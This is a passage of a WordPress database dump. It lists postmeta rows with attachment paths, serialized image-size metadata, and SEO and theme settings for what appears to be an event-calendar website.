;a:4:{s:4:\"file\";s:19:\"LGZ-Pic-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"LGZ-Pic-400x600.png\";s:5:\"width\";i:400;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4637,1218,'_wp_attached_file','2017/11/ProjectLinusCalendar.png'),(4638,1218,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:32:\"2017/11/ProjectLinusCalendar.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ProjectLinusCalendar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:32:\"ProjectLinusCalendar-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"ProjectLinusCalendar-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4651,1221,'_wp_attached_file','2017/11/NicholasClaud.png'),(4652,1221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:25:\"2017/11/NicholasClaud.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"NicholasClaud-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"NicholasClaud-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"NicholasClaud-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4660,1223,'_wp_attached_file','2017/11/Journey.png'),(4661,1223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2017/11/Journey.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Journey-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Journey-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Journey-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4673,1225,'_wp_attached_file','2017/11/NoPicture.png'),(4674,1225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2017/11/NoPicture.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"NoPicture-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"NoPicture-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"NoPicture-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4677,1227,'_wp_attached_file','2017/11/Dula.png'),(4678,1227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2017/11/Dula.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Dula-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"Dula-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"Dula-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5155,1298,'_edit_lock','1541265006:8'),(5156,1299,'_wp_attached_file','2018/09/NutsandBoltsCalendarImage.png'),(5157,1299,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:37:\"2018/09/NutsandBoltsCalendarImage.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"NutsandBoltsCalendarImage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:37:\"NutsandBoltsCalendarImage-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4687,1229,'_wp_attached_file','2017/11/Yasmine.png'),(4688,1229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2017/11/Yasmine.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Yasmine-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Yasmine-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Yasmine-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5158,1298,'_edit_last','8'),(4696,1231,'_wp_attached_file','2017/11/Oretta.png'),(4697,1231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2017/11/Oretta.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Oretta-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"Oretta-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"Oretta-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5166,1298,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(4705,1233,'_wp_attached_file','2017/11/josephine.png'),(4706,1233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2017/11/josephine.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"josephine-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"josephine-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"josephine-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5165,1298,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5162,1298,'day','1539043200'),(5163,1298,'_yoast_wpseo_content_score','90'),(5164,1298,'_yoast_wpseo_primary_event_categories','55'),(4722,1235,'_wp_attached_file','2017/11/EventImage.png'),(4723,1235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:22:\"2017/11/EventImage.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"EventImage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"EventImage-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"EventImage-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4724,1236,'_wp_attached_file','2017/11/Nuts-Bolts-Financial-Aid.png'),(4725,1236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:628;s:4:\"file\";s:36:\"2017/11/Nuts-Bolts-Financial-Aid.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-300x157.png\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-768x402.png\";s:5:\"width\";i:768;s:6:\"height\";i:402;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"Nuts-Bolts-Financial-Aid-1024x536.png\";s:5:\"width\";i:1024;s:6:\"height\";i:536;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"Nuts-Bolts-Financial-Aid-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4726,1237,'_wp_attached_file','2017/11/FinancialAid-1.png'),(4727,1237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:816;s:6:\"height\";i:1056;s:4:\"file\";s:26:\"2017/11/FinancialAid-1.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"FinancialAid-1-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"FinancialAid-1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4741,1240,'_wp_attached_file','2017/11/HCCLogo.jpeg'),(4742,1240,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:20:\"2017/11/HCCLogo.jpeg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"HCCLogo-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"HCCLogo-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"HCCLogo-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"HCCLogo-450x300.jpeg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"HCCLogo-512x300.jpeg\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"HCCLogo-180x110.jpeg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"HCCLogo-180x180.jpeg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"HCCLogo-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4754,1243,'_edit_lock','1510715807:1'),(4755,1243,'_edit_last','1'),(4756,1243,'ts_template','a:0:{}'),(4757,1243,'_thumbnail_id','577'),(4759,1243,'video_embed',''),(4760,1243,'audio_embed',''),(4761,1243,'_post_image_gallery',''),(4762,1243,'_yoast_wpseo_content_score','30'),(4763,1243,'_yoast_wpseo_primary_category','2'),(4764,1243,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(4765,1243,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(4766,1243,'page_settings',NULL),(4767,1243,'post_settings','a:8:{s:8:\"subtitle\";s:0:\"\";s:10:\"hide_title\";s:2:\"no\";s:12:\"hide_related\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:3:\"yes\";s:14:\"title_position\";s:5:\"below\";}'),(4773,1243,'ts_article_views','754'),(4776,1250,'_wp_attached_file','2017/11/DPCalendarThumbnail.png'),(4777,1250,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:31:\"2017/11/DPCalendarThumbnail.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"DPCalendarThumbnail-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:31:\"DPCalendarThumbnail-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"DPCalendarThumbnail-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4788,1252,'_wp_attached_file','2017/11/IMG_1576.png'),(4789,1252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1819;s:6:\"height\";i:2551;s:4:\"file\";s:20:\"2017/11/IMG_1576.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1576-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1576-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_1576-768x1077.png\";s:5:\"width\";i:768;s:6:\"height\";i:1077;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1576-730x1024.png\";s:5:\"width\";i:730;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1576-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_1576-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_1576-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_1576-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1576-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"IMG_1576-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_1576-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4791,1256,'_wp_attached_file','2016/11/APPACalendar.png'),(4792,1256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:24:\"2016/11/APPACalendar.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"APPACalendar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:24:\"APPACalendar-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"APPACalendar-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";